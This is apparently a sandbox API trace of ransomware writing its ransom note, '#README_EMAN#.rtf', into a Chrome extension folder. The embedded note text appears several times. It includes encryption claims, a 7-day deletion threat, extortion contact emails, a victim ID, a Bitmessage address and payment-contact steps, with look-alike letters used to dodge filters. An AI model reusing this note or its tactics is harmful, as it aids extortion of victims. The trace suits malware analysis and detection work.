m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.345] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.346] CloseHandle (hObject=0x294) returned 1 [0272.346] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0272.346] GetLastError () returned 0x2 [0272.346] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 